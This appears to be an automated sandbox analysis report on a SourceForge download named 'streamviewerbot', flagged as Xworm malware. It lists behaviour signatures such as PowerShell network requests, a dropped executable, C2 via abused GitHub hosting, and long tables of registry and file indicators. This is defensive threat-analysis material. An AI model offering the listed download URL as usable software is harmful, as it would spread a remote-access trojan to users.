Analysis Overview
Threat Level: Known bad
The file https://sourceforge.net/projects/streamviewerbot/files/latest/download was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of UnmapMainImage
NTFS ADS
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Kills process with taskkill
Enumerates system info in registry
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 10:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 10:32
Reported
2024-05-29 10:49
Platform
win11-20240508-en
Max time kernel
981s
Max time network
982s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\ras\SSTPProxy\ProxyConfig.xml | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | C:\Windows\System32\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File created | C:\Windows\INF\netsstpa.PNF | C:\Windows\Explorer.EXE | N/A |
| File created | C:\Windows\INF\netrasa.PNF | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Tasks\SA.DAT | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133614523960265181" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1 | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "10" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\1\NodeSlot = "12" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
